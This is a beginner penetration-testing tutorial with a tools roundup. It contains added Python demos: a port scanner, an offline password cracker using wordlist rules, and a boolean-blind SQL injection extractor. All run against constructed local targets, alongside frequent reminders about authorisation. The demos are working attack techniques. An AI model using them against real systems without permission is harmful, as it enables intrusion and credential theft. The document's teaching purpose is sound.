• Understand complex computer systems and technical cybersecurity terms
• Collect the required information from the organization to enable penetration tests
• Plan and create penetration methods, scripts, and tests
• Carry out onsite testing of clients’ infrastructure and remote testing of clients’ networks to expose weaknesses in security
• Work with clients to determine their requirements from the test
• Conduct penetration testing and vulnerability scanning using automated tools, ad-hoc tools, and manual testing
• Analyze root causes and deliver strategic recommendations during security reviews
• Create reports and recommendations from your findings
• Understand how the flaws that you identify could affect the business, or a business function, if they’re not fixed
• Make every flaw you identify reproducible (exact request, payload and observed response) so that developers can fix it and re-test
• Keep all client data and information confidential
Types of Penetration Testers?
Pen testers are often described with the hacker "hat" labels below,
although a penetration tester by definition works with the system
owner’s permission and therefore operates as a white hat:
1. Black hat penetration testers
2. White hat penetration testers
3. Grey hat penetration testers
What is the difference between Black, White and Grey
hat hackers?
Black Hat Hackers:
Black hat hackers (aka Black hats) are cybercriminals. They use their
skills with malicious intent for personal or financial gain. They break
into computer networks to steal or destroy data, or to make the system
unusable for those who are authorized to use it. Typical activities
include breaking into banks, stealing credit card information, and
building and using botnets to perform DDoS (Distributed Denial of
Service) attacks.

White Hat Hackers:

White hat hackers (aka White hats) are usually called ethical hackers.
Ethical hackers work for good reasons rather than evil. Usually,
companies recruit these white hat hackers as full-time employees, and
some companies work with white hat hackers on a contract basis as
security specialists to find security loopholes in their systems.
White hat hackers attack a system only after getting permission from
the owner of the system.

Grey Hat Hackers:

Grey hat hackers (aka Grey hats) may hack a system for ethical or
unethical reasons. Their activities fall somewhere between those of
black hat hackers and white hat hackers. Grey hat hackers look for
vulnerabilities in a system without malicious intent, but their
activity is still illegal because they attack the system without
getting permission from the owner. After finding security
vulnerabilities, they report them to the owner of the system, sometimes
requesting a fee to fix the issue. If the owner doesn’t respond, they
will sometimes disclose the security flaw to the public.
What are the types of Penetration Tests?
The different types of pen tests are as follows

1. Network Services Tests

Network services pen tests aim to identify security weaknesses and
vulnerabilities in the network. These tests can be run both locally and
remotely.

Pen testers should target the following network areas

• Firewall config test
• Stateful analysis test
• Firewall bypass test
• IPS deception
• DNS level attacks such as zone transfer testing, switching or routing issues, and other network tests as required
Pen testers also test commonly exposed services such as
• Secure Shell (SSH)
• SQL Server or MySQL
• Simple Mail Transfer Protocol (SMTP)
• File Transfer Protocol (FTP)
2. Web Application Tests
Web application pen tests aim to identify the security vulnerabilities
of web applications, web browsers, and their components such as APIs
and client-side plugins (ActiveX, Applets, Silverlight, which are now
largely obsolete but still found in legacy applications).

3. Client Side Tests

Client-side pen tests aim to find security vulnerabilities in
client-side software applications and exploit them.

4. Wireless Tests
Wireless pen tests involve analyzing the Wi-Fi networks and wireless
devices deployed at the client site. Wireless devices include laptops,
netbooks, tablets, smartphones, iPods etc.

5. Social Engineering Tests

Employees disclosing sensitive information to outsiders is one of the
most common causes of security incidents. All employees should follow
security standards and policies so that they can recognise and resist
social engineering attempts. These tests are mostly done through
communication channels such as telephone, mobile and internet, and
they target employees, helpdesks and processes.

Social engineering pen tests can be subcategorized into two types

Remote Tests:
Remote tests intend to trick an employee into disclosing sensitive
information through an electronic means or over the phone (e.g., a
phishing e-mail campaign or a pretext call to the helpdesk).

Physical Tests:
Physical tests check whether the physical controls protecting sensitive
information hold up against in-person tactics such as impersonating
staff or contractors, tailgating through access-controlled doors, or
leaving prepared USB devices where employees will find them. They are
common for facilities with strict physical security requirements, such
as military sites.
What are the Types of Pen Testing?
Pen tests are also classified by how much knowledge of the target the
tester is given. There are three types, which are as follows

1. Black Box Penetration Testing
2. White Box Penetration Testing
3. Grey Box Penetration Testing

Black Box Penetration Testing

In the Black Box approach, the testers assess the target system with no
inside knowledge of it. They are given only high-level details such as
a URL, an IP range or the company name, and they do not see source
code or architecture documents. This simulates an external attacker,
so the test starts with reconnaissance (DNS, port and service
discovery) and works inwards by trial and error. It is still an
authorized test performed under an agreed scope; the "black" refers to
the tester’s lack of knowledge, not to black hat hacking. Because the
tester has to discover everything, black box tests take longer and can
miss flaws that are only visible from the inside.

White Box Penetration Testing

In the White Box approach, the testers are given complete details
about the system: architecture, source code, credentials and
configuration. Since they have full information, a white box test can
be completed much faster than a black box test, and it can reach
code-level flaws that an outside attacker would not find within the
test window. This approach is also known as clear box, glass box, open
box and structural testing.

Grey Box Penetration Testing

In the Grey Box approach, the testers are given partial knowledge, for
example a low-privileged user account and documentation of the
application, but not the source code. It combines the Black Box and
White Box techniques, typically mixing manual and automated testing,
and it models an attacker who already has a foothold, such as a
malicious insider or someone who has phished a user’s credentials.
Like the other two approaches it is carried out with the owner’s
permission; it should not be confused with grey hat hacking, which is
unauthorized.

Limitations of Penetration Testing

Penetration testing cannot find all vulnerabilities in a target system.
There are some limitations based on the resources and restrictions of
a test, such as

• Limitations of skills of a pen tester – it’s hard to find experienced pen testers, and a tester only finds what they know how to look for
• Limitations of scope – most organizations leave out some tests due to resource or availability constraints (e.g., no denial-of-service testing against production)
• Limitations of time – a test is a snapshot; new vulnerabilities appear after it is finished
• Limitations of budget
• Limitations of tools used – automated tools miss logic flaws and produce false positives
Penetration Testing Tools:
Pen Testing Tools are classified into Vulnerability Scanners and
Vulnerability Attackers. Vulnerability Scanners show you the weak
spots of the system whereas Vulnerability Attackers show you the
weak spots of the system and attack them.
Free Penetration Testing Tools:
Some of the free penetration testing tools (network vulnerability
assessment tools/web vulnerability assessment tools) are NMap,
Metasploit Framework, Wireshark, Cain & Abel, W3af, OpenVAS and OWASP
ZAP. Nessus has a free Essentials edition limited to 16 IP addresses.
OpenSSL is a cryptography toolkit rather than a pen testing tool, though
its command-line client is handy for inspecting TLS configurations.
Commercial Penetration Testing Tools:
Some of the commercial penetration testing tools are Burp Suite
Professional, Netsparker, Acunetix, Metasploit Pro and Veracode. (Pure
Hacking and Torrid Networks are security service providers rather than
tools.)
How to choose a Penetration Testing Tool?
We need to choose a penetration testing tool based on the following
points.

• It should be easy to use
• It should be easy to configure & deploy
• It should scan for vulnerabilities reliably, with a low false-positive rate
• Categorization of vulnerabilities based on severity
• It should generate detailed reports and logs
• It should be cost-effective in terms of budget
• A good support team & technical documentation is essential
Conclusion:
We’ve prepared this tutorial by keeping software testers in mind and
covered everything needed for them to learn and implement
Penetration Testing at work. Even though it’s a beginner’s guide for
Penetration Testing, we hope you would be able to improve your
knowledge on Penetration Testing with this tutorial.

If you have any queries, please comment below. If you are a
penetration tester, please share your experience in the comment
section below.


Top 15 Penetration Testing Tools (Pen Testing Tools) in 2020
In this post, I am going to list some of the best and most popular
penetration testing tools.

Note: You should only use these Security Testing Tools to attack
an application that you have permission to test.
Here are some of the Penetration testing tools which are popular among
Pen Testers.

• 1. What is Penetration Testing
• 2. Metasploit
• 3. Wireshark
• 4. Spyse
• 5. NMap
• 6. Netsparker
• 7. Acunetix
• 8. w3af
• 9. Kali Linux
• 10. Nessus
• 11. Cain & Abel
• 12. Zed Attack Proxy
• 13. John The Ripper
• 14. THC Hydra
• 15. Burpsuite
• 16. SqlMap
• 17. Sqlninja
What is Penetration Testing?
Penetration testing is a type of Security testing which is performed to
evaluate the security of a system (hardware, software, networks or an
information system environment). The goal of this testing is to find as
many of the security vulnerabilities present in an application as
possible by evaluating the system with the same techniques an attacker
would use, so that data can be protected from attackers while the
functionality of the system is maintained. It is a type of
Non-functional testing which makes authorized attempts to violate the
security of the system. It is also known as Pen Testing or Pen Test,
and the tester who does this testing is a penetration tester, aka
ethical hacker.

We use penetration testing tools to find and exploit vulnerabilities in a
system. We know it’s difficult to build 100% secure systems but we
have to know what kind of security issues we are going to deal with.

There are many paid and free penetration testing tools available in the
market. Here, we discuss top 15 penetration testing tools.

Metasploit
Metasploit is a computer security project that provides the user with
important information about security vulnerabilities and a framework
for exploiting them.

Metasploit Framework is an open source penetration testing and
exploit development platform that provides you with access to the
latest exploit code for various applications, operating systems, and
platforms.

It can be used against web applications, servers, networks etc. It has
a command-line console (msfconsole) and, in the commercial editions, a
web GUI; it works on Windows, Linux, and Apple Mac OS. The Framework
itself is free and open source (BSD-licensed); Metasploit Pro is the
commercial product, and it comes with a free limited trial.
Metasploit Features:
Some of the features of Metasploit are as follows:

• It has a command-line and GUI interface
• It works on Linux, Windows & Mac OS X
• Network discovery
• Vulnerability scanner import
• Basic exploitation
• Module browser
• Manual exploitation
• Metasploit Framework is provided to the InfoSec community free of charge
Download link: https://www.metasploit.com/

Wireshark
Wireshark is one of the freely available open source penetration
testing tools. Basically, it is a network protocol analyzer: it lets you
capture and interactively browse the traffic running on a computer
network. It runs on Windows, Linux, Unix, Mac OS, Solaris, FreeBSD,
NetBSD, and many others. It is widely used by network professionals,
security experts, developers, and educators. The information that is
retrieved via Wireshark can be viewed through a GUI or the TTY-mode
TShark utility.
Wireshark Features:
Some of the features of Wireshark are as follows:

• Deep inspection of hundreds of protocols
• Live capture and offline analysis
• It runs on Windows, Linux, UNIX, macOS, Solaris, FreeBSD, NetBSD, and many others
• Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
• Rich VoIP analysis
• Read/write many different capture file formats
• Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, etc.
• Coloring rules can be applied to the packet list for quick and intuitive analysis
• Capture files compressed with gzip can be decompressed on the fly
• Output can be exported to XML, PostScript, CSV or plain text
Download link: https://www.wireshark.org/
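
To show what a protocol dissector like Wireshark does under the hood, here is an added example (it is not Wireshark’s code): a minimal decoder for an Ethernet II / IPv4 / TCP frame that verifies both the IPv4 header checksum and the TCP checksum before trusting any field, the way a dissector flags "checksum incorrect" on a malformed packet. The frame is a hand-constructed TCP SYN, not a real capture; its MAC addresses, IP addresses and ports were made up for the demo.

```python
import struct
from ipaddress import IPv4Address

# A single Ethernet II / IPv4 / TCP SYN frame, hand-constructed for this
# example (not a real capture): 192.168.1.10:50000 -> 10.0.0.5:443, TTL 64.
FRAME = bytes.fromhex(
    "001122334455" + "66778899aabb" + "0800"                  # Ethernet II
    + "4500" + "0028" + "1c46" + "4000" + "4006" + "52d3"     # IPv4 header
    + "c0a8010a" + "0a000005"
    + "c350" + "01bb" + "00000001" + "00000000"               # TCP header
    + "5002" + "7210" + "ad0e" + "0000"
)

TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR", "NS"]


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def dissect(frame: bytes) -> dict:
    """Decode Ethernet II -> IPv4 -> TCP and verify both checksums.
    Raises ValueError for anything that is not a well-formed IPv4/TCP frame."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError(f"not IPv4: ethertype 0x{ethertype:04x}")
    ip = frame[14:]
    (ver_ihl, _tos, total_len, ident, flags_frag,
     ttl, proto, _ip_csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    # A header carrying a correct checksum sums to zero over all its words.
    if (ver_ihl >> 4) != 4 or checksum(ip[:ihl]) != 0:
        raise ValueError("bad IPv4 version or header checksum")
    if proto != 6:
        raise ValueError(f"not TCP: protocol {proto}")
    seg = ip[ihl:total_len]
    (sport, dport, seq, ack, off_flags,
     window, _tcp_csum, _urg) = struct.unpack("!HHIIHHHH", seg[:20])
    # The TCP checksum covers a pseudo-header (addresses, protocol, length)
    # plus the whole segment.
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(seg))
    if checksum(pseudo + seg) != 0:
        raise ValueError("bad TCP checksum")
    flags = off_flags & 0x01FF
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
        "ttl": ttl, "ip_id": ident, "df": bool(flags_frag & 0x4000),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "window": window, "data_offset": (off_flags >> 12) * 4,
        "flags": [n for i, n in enumerate(TCP_FLAG_NAMES) if flags & (1 << i)],
    }


def verify(frame: bytes) -> bool:
    """True if the frame dissects cleanly with valid checksums."""
    try:
        dissect(frame)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    for key, value in dissect(FRAME).items():
        print(f"{key:>12}: {value}")
```

Flipping a single byte anywhere in the IP or TCP header (for example the TTL) makes verify() return False, which is the same signal Wireshark gives when a capture has been tampered with or truncated; on a live capture from your own machine, however, expect TCP checksum "errors" on outgoing packets, because the NIC fills the checksum in after the capture point (checksum offload).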

Spyse
Spyse is a search engine that uses OSINT (open-source intelligence)
techniques to collect, process, and provide structured information
about various elements of a network. Spyse users are able to perform a
detailed search on the following network elements:

Spyse Features:
• Domains and subdomains
• IP addresses and subnets
• Encryption certificates
• Protocols
• Open ports
• WHOIS records
• Autonomous Systems (AS)
Website: https://spyse.com/

NMap
NMap is an abbreviation of Network Mapper. It is a free and open
source security scanning tool for network exploration and security
auditing. It works on Linux, Windows, Solaris, HP-UX, BSD variants
(including Mac OS), AmigaOS. It is used to determine what hosts are
available on the network, what services those hosts are offering, what
operating systems and versions they are running, what type of packet
filters/firewalls are in use etc. Many systems and network
administrators find it useful for routine tasks such as network
inventory, checking for open ports, managing service upgrade schedules,
and monitoring host or service uptime. It comes with both a command
line interface and a GUI (Zenmap).

NMap Port Scanning Tool features:

Some of the features of NMap are as follows:

• It discovers hosts on a network
• It identifies open ports on target hosts in preparation for auditing
• It is used to determine network inventory, network mapping, maintenance and asset management
• It detects vulnerabilities and misconfigurations in a network via Nmap Scripting Engine (NSE) scripts
• It generates traffic to hosts on a network, with response analysis and response time measurement
Download link: https://nmap.org/
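
As an added illustration of what a port scanner does at the lowest level (example code, not Nmap’s own), here is a TCP connect scan in Python, the equivalent of nmap -sT. It starts a throwaway listener on 127.0.0.1 so there is a known open port to find, then probes a small port range with a thread pool and reports which ports completed the three-way handshake. Everything about the target is constructed for the demo; only run scans like this against hosts you are authorised to test.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_listener():
    """Open a throwaway TCP listener on 127.0.0.1 so the scan has a known
    open port to find (a constructed target, not a real network host)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: the OS picks a free port
    srv.listen(16)
    port = srv.getsockname()[1]

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:             # listener closed: stop serving
                break

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port


def probe(host: str, port: int, timeout: float = 0.3) -> bool:
    """TCP connect() probe: a completed three-way handshake means 'open'.
    A RST (connection refused) means 'closed'; a timeout usually means a
    firewall silently dropped the SYN, which Nmap reports as 'filtered'."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan(host: str, ports, workers: int = 32) -> list:
    """Probe every port in `ports` concurrently; return the open ones sorted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p)), ports))
    return sorted(p for p, is_open in results if is_open)


def demo():
    """Start the local listener, scan a small window of ports around it,
    and return (listener_port, open_ports)."""
    srv, port = start_listener()
    try:
        return port, scan("127.0.0.1", range(port - 5, port + 6))
    finally:
        srv.close()


if __name__ == "__main__":
    listener_port, open_ports = demo()
    print(f"listener on {listener_port}; open ports found: {open_ports}")
```

A connect scan completes the handshake, so every probe shows up in the target’s application logs; Nmap’s default SYN scan (-sS) sends only the SYN and never completes the connection, which needs raw-socket privileges but is quieter. Service and version detection (-sV) is a separate step that talks to each open port after this discovery phase.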

Netsparker
Netsparker is a web application security scanner. It is an automated
and easy to use web application security scanner. It is used to
automatically identify security issues such as SQL injection and
Cross-Site Scripting (XSS) in websites, web applications, and web
services. Its Proof-based Scanning technology doesn’t just report
vulnerabilities, it also produces a Proof of Concept to confirm they
are not false positives, which reduces the time spent manually
verifying the identified vulnerabilities after a scan is finished.

It is a commercial tool.

Netsparker Security Scanner Features:

Some of the features of Netsparker are as follows:

• Vulnerability assessment
• Advanced web scanning
• Proof-based scanning technology for accurate vulnerability detection and scan results
• Full HTML5 support
• Web services scanning
• HTTP request builder
• SDLC integration
• Reporting
• Exploitation
• Manual testing
• Anti-CSRF (Cross-site Request Forgery) token support
• Automatic detection of custom 404 error pages
• REST API support
Download link: https://www.netsparker.com

Acunetix
Acunetix is one of the leading web vulnerability scanners which
automatically scans any website. It detects over 4500 web
vulnerabilities which include all variants of SQL injection, XSS, XXE,
SSRF, and Host Header Injection. Its DeepScan Crawler scans
HTML5 websites and AJAX-heavy client-side SPAs. It allows users to
export discovered vulnerabilities to issue trackers such as Atlassian
JIRA, GitHub, Microsoft Team Foundation Server (TFS). It is available
on Windows, Linux, and Online.

It is a commercial tool.

Acunetix features:
Some of the features of Acunetix are as follows:

• In-depth crawl and analysis – automatically scans all websites
• A high detection rate of vulnerabilities with low false positives
• Integrated vulnerability management – prioritize and control threats
• Integration with popular WAFs and issue trackers such as JIRA, GitHub, TFS
• Free network security scanning and Manual Testing tools
• Runs on Windows, Linux and online
Download link: https://www.acunetix.com/

w3af
W3af is a Web Application Attack and Audit Framework. It aims to help
secure web applications by finding and exploiting web application
vulnerabilities. It identifies more than 200 vulnerability types and
reduces your site’s overall risk exposure. It identifies
vulnerabilities like SQL injection, Cross-Site Scripting (XSS),
guessable credentials, unhandled application errors, and PHP
misconfigurations. It has both a graphical and a console user
interface. It works on Windows, Linux, and Mac OS.

W3af features:
Some of the features of W3af are as follows:

• Integration of web and proxy servers into the code
• Injecting payloads into almost every part of the HTTP request
• Proxy support
• HTTP Basic and Digest authentication
• UserAgent faking
• Add custom headers to requests
• Cookie handling
• HTTP response cache
• DNS cache
• File upload using multipart
It’s a free tool

Download link: http://w3af.org/

Kali Linux
Kali Linux is an open source penetration testing distribution which is
maintained and funded by Offensive Security Ltd. It is itself a
Debian-based Linux operating system, so it is run as a native install,
a live USB or a virtual machine rather than installed on top of another
OS. Kali contains more than 600 penetration testing tools which are
geared towards various information security tasks, such as Penetration
Testing, Security research, Computer Forensics, and Reverse
Engineering.

Kali Linux features:

Some of the features of Kali Linux are as follows:

• Full customization of Kali ISOs with live-build, allowing us to create our own Kali Linux images
• ISO of Doom and Other Kali Recipes
• Cloud version of Kali Linux can be set up easily in the Amazon Elastic Compute Cloud
• It contains a bunch of Meta package collections which aggregate different tool sets
• Full Disk Encryption (FDE)
• Accessibility features for visually impaired users
• Live USB with Multiple Persistence Stores
Download link: https://www.kali.org/

Nessus
Nessus is a vulnerability assessment solution for security
practitioners, created and maintained by Tenable. It aids in
identifying and fixing vulnerabilities such as software flaws, missing
patches, malware, and misconfigurations across a variety of operating
systems, devices and applications. It supports Windows, Linux, Mac,
Solaris etc.

Nessus features:
Some of the features of Nessus are as follows:

• Reports can be easily customized to sort by vulnerability or host, create an executive summary, or compare scan results to highlight changes
• It detects both the remote flaws of the hosts that are on a network and their missing patches and local flaws as well
• Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system
• Mobile device audits
• Configuration audits
Download link: http://www.tenable.com/products/nessus

Cain & Abel

Cain & Abel (often abbreviated to Cain) is a password recovery tool for
Microsoft Windows. It recovers various kinds of passwords and network
keys from captured traffic and from hashes, using methods such as
network packet sniffing, dictionary attacks, brute force and
cryptanalysis attacks. It is no longer maintained and targets older
Windows versions, so today it is mostly of historical interest.
Cain & Abel features:
Some of the features of Cain & Abel Password Cracker or Password
Hacking tool are as follows:

• WEP (Wired Equivalent Privacy) cracking
• Ability to record VoIP conversations
• Decoding scrambled passwords
• Revealing password boxes
• Uncovering cached passwords
• Dumping protected storage passwords
Download link: http://cain-abel.en.softonic.com/download

Zed Attack Proxy

ZAP is a freely available open source web application security scanner
tool. It finds security vulnerabilities in web applications during the
development and testing phases. It provides automated scanners and a
set of tools that allow us to find security vulnerabilities manually.
It is designed to be used both by those new to application security and
by professional penetration testers. It works on different operating
systems such as Windows, Linux, Mac OS X.
ZAP features:
Some of the features of ZAP are as follows:

• Intercepting proxy server
• Traditional and AJAX spiders
• Automated scanner
• Passive scanner
• Forced browsing
• Fuzzer
• WebSocket support
Download link: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

John The Ripper

John The Ripper (also known as JTR) is a free and open source
password cracking tool that is designed to crack even very
complicated passwords. It is one of the most popular password testing
and breaking programs. It is most commonly used to perform dictionary
(wordlist) attacks, optionally with mangling rules that derive variants
of each word, and it also supports brute-force ("incremental") mode. It
helps to identify weak password vulnerabilities in a network. It is
available for UNIX, Windows, DOS, and OpenVMS. It comes in a pro and a
free (community-enhanced "jumbo") form.

Download link: http://www.openwall.com/john/
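
The following added example (not part of the original post, and not John the Ripper’s own code) shows in miniature what JtR’s wordlist mode with rules does: it takes constructed salted SHA-256 records standing in for a shadow file, generates candidate passwords from a short wordlist plus a few mangling rules, and compares hashes. The records, the wordlist, the rules and the hash format are assumptions made for the demo. The same loop also explains why slow, salted hashes (bcrypt, scrypt, Argon2) matter in practice: every guess costs the attacker one hash computation, so the cost per hash is the defender’s main lever.

```python
import hashlib


def hash_password(salt: str, password: str) -> str:
    """Salted SHA-256, standing in for a shadow-file hash format. It is used
    here only because it is in the standard library; a real system should
    use a deliberately slow KDF such as bcrypt, scrypt or Argon2."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed "shadow" records (user, salt, hash). The passwords behind them
# were invented for this example.
RECORDS = [
    ("alice", "x1", hash_password("x1", "Password1")),
    ("bob",   "q9", hash_password("q9", "letmein!")),
    ("carol", "z4", hash_password("z4", "Tr0ub4dor&3")),   # not derivable from the wordlist
]

# A deliberately tiny wordlist; JtR ships password.lst with a few thousand entries.
WORDLIST = ["password", "letmein", "qwerty", "welcome", "dragon"]

# Common suffixes users append to satisfy complexity rules.
SUFFIXES = list("0123456789") + list("!@#") + ["123", "2020"]


def mangle(word: str):
    """A few JtR-style wordlist rules: as-is, capitalised and upper-cased,
    each with and without a common digit or symbol suffix."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in SUFFIXES:
            yield base + suffix


def crack(records, wordlist) -> dict:
    """Offline dictionary attack: hash every candidate under every salt and
    compare against the stored hashes. Returns {user: recovered_password}."""
    by_salt = {}
    for user, salt, digest in records:
        by_salt.setdefault(salt, {})[digest] = user
    found = {}
    for word in wordlist:
        for candidate in mangle(word):
            # One hash per (candidate, salt). Without salts one hash would
            # test the candidate against every user at once, which is
            # exactly what salts are there to prevent.
            for salt, digests in by_salt.items():
                user = digests.get(hash_password(salt, candidate))
                if user is not None:
                    found[user] = candidate
    return found


if __name__ == "__main__":
    print(crack(RECORDS, WORDLIST))
```

Two of the three records fall to the 5-word list once rules are applied; the third survives only because no rule derives it from a wordlist entry, which is the property a good passphrase needs. With per-user salts the attacker has to hash each candidate once per salt, and with a slow KDF each of those hashes costs milliseconds instead of microseconds.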

THC Hydra
THC-Hydra, also called Hydra, is one of the popular password cracking
tools. It supports both a GUI (xhydra) and a command line user
interface. Unlike John the Ripper it is an online cracker: it performs
rapid dictionary and brute-force login attempts directly against
network services, and it supports more than 50 protocols including
cisco, telnet, ftp, http, https, mssql, mysql, svn etc. It is a fast and
stable network login hacking tool. This tool allows researchers and
security consultants to demonstrate that weak or default credentials
would give an attacker unauthorized access.
Download link: https://github.com/vanhauser-thc/thc-hydra

Burpsuite
Burpsuite is a graphical tool for testing Web Application security. It
is developed by PortSwigger Web Security. It has three editions: the
Community edition, which is free, the Professional edition, and the
Enterprise edition. The Community edition has significantly reduced
functionality. Burp Proxy allows manual testers to intercept all
requests and responses between the browser and the target application,
even when HTTPS is being used. In addition to basic functionality, such
as the proxy server, scanner, and intruder, this tool also contains
advanced options such as a spider, repeater, decoder, comparer,
sequencer, extender API and clickbandit tool. It works on Windows, Mac
OS X, and Linux environments.

Download link: http://portswigger.net/burp/

SqlMap
Sqlmap is a free and open source penetration testing tool. It
automates the process of detecting and exploiting SQL injection flaws
and taking over database servers. It comes with many detection engines
and many features for an ultimate penetration tester. It comes with a
command line interface. It runs on Linux, Windows and Mac OS X.
64

SqlMap features:
Some of the features of SqlMap are as follows:

• Full support for database management systems such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Sybase, SAP MaxDB, HSQLDB, H2, and Informix
• Full support for the six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band
• Support for direct connection to the database without passing via a SQL injection
• Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack
• Support to dump database tables entirely or specific columns as per the user’s choice
• Support to search for specific database names, tables or columns across all databases’ tables
• Support to establish an out-of-band TCP connection between the attacker machine and the database server
Download link: http://sqlmap.org/
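
To show how the first of those six techniques, boolean-based blind injection, actually recovers data, here is an added example (it is not sqlmap’s code). A constructed in-memory SQLite database and a lookup function play the role of a vulnerable endpoint that reveals only whether a row was found; the extractor then reconstructs a secret from another table one yes/no answer at a time, first its length and then each character by binary search. The schema, the secret and the oracle function are all assumptions for the demo. The probe counter shows the cost of the technique, roughly eight requests per character, which is why sqlmap prefers UNION or error-based injection whenever the page echoes data back.

```python
import sqlite3

# Constructed target (example data, not from the original tutorial): an
# in-memory database and a lookup that behaves like a vulnerable "/item?id="
# endpoint whose only observable output is whether a row was found.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO items VALUES (1, 'widget')")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

PROBES = [0]   # number of "requests" the attack has issued so far


def item_exists(id_param: str) -> bool:
    """The vulnerable oracle: the parameter is concatenated into the WHERE
    clause and the caller learns only found / not found."""
    PROBES[0] += 1
    sql = f"SELECT name FROM items WHERE id = {id_param}"
    return conn.execute(sql).fetchone() is not None


def extract(column: str, table: str, where: str = "1=1", max_len: int = 32):
    """Boolean-based blind extraction (sqlmap technique 'B').
    The secret never appears in a response; it is rebuilt from the answers
    to true/false questions. Returns (recovered_value, probes_used)."""
    PROBES[0] = 0
    sub = f"(SELECT {column} FROM {table} WHERE {where} LIMIT 1)"
    # Step 1: recover the length with a linear sweep.
    length = 0
    for n in range(max_len + 1):
        if item_exists(f"1 AND length({sub}) = {n}"):
            length = n
            break
    # Step 2: binary-search each character's code point; 7 probes cover
    # 0..127. SQLite's unicode() plays the role of ASCII() on other engines.
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if item_exists(f"1 AND unicode(substr({sub}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out, PROBES[0]


if __name__ == "__main__":
    value, cost = extract("secret", "users")
    print(f"recovered {value!r} in {cost} probes")
```

Against a real endpoint each probe is an HTTP request, and the "found / not found" signal is whatever differs between the two responses (a status code, a string on the page, a content length). Time-based blind injection uses the same search, but the signal is a deliberate delay, which is slower still. Parameterised queries close this hole completely: the injected AND clause would then be looked up as a literal id value and never parsed as SQL.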

Sqlninja
Sqlninja is an open source penetration testing tool. The aim of this
tool is to exploit SQL injection vulnerabilities in web applications
that use Microsoft SQL Server as the back end. It has a command-line
interface. It works on Linux and Apple Mac OS X.

Sqlninja features:
Some of the features of Sqlninja are as follows:
• Fingerprinting of the remote SQL Server
• Direct and reverse shell, both for TCP and UDP
• Creation of a custom xp_cmdshell if the original one has been disabled
• Reverse scan in order to look for a port that can be used for a reverse shell
• OS privilege escalation on the remote DB server
• Extraction of data from the remote DB
Download link: http://sqlninja.sourceforge.net
Some other Penetration Testing Tools are as follows:

There are a lot of hacking tools on the market, so we are including
some other tools in this list.
Aircrack-ng
Download link: https://www.aircrack-ng.org/
Arachni
Download link: http://www.arachni-scanner.com/
BeEF
Download link: https://beefproject.com/
NIKTO
Download link: https://github.com/sullo/nikto
Canvas
Download link: http://www.immunitysec.com
Social Engineer Toolkit
Download link: https://www.social-engineer.org
Ettercap
Download link: https://ettercap.github.io/ettercap/downloads.html
Veracode
Download link: http://www.veracode.com/demos
IBM AppScan
Download link: http://www-03.ibm.com/software/products/en/appscan
Nagios
Download link: http://www.nagios.org/
WebScarabNG
Download link: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Maltego
Download link: http://www.paterva.com/
IronWASP
Download link: http://ironwasp.org/
HconSTF
Download link: http://www.hcon.in/
OpenVAS
Download link: http://www.openvas.org/
Conclusion:
We tried our best to list popular Penetration Testing Tools (both Open
Source and Commercial). Let us know your favorite Penetration
testing tool in the comments below. If you feel I forgot to mention any
of your favorite tools, let us know in the comments below. We will try
to include it in our list and update this post.

17 Best Bug Tracking Tools [Defect Tracking Tools]
What is Bug Tracking Tool / What is Defect Tracking Tool in Software Testing?
Bug tracking tools in software testing are applications that help us to
record, report, and monitor the bugs in a software development
project.
Before looking into the popular defect tracking tools list, I would like
to raise some questions. Are you working in a company where excel
sheets are used to track defects? I don’t say that using excel is not a
good way of tracking bugs, but why not try an issue tracking tool when
good open source alternatives exist? Everything in an organization is
related to ROI (return on investment), so most start-ups don’t invest
in defect tracking tools and simply use excel sheets to move on. Are
you using any tool for tracking bugs? If the tool you are using is not
in the list below, let us know which tool you are using and we will
include it in our list.

Open Source Bug Tracking Tools

Open source bug tracking tools are available for free and these are
the alternatives to popular commercial bug tracking tools. It doesn’t
mean that all the open-source defect tracking tools are completely
free. Some open-source bug tracking systems bring added value to
their open-source one with their commercial project. Here in this
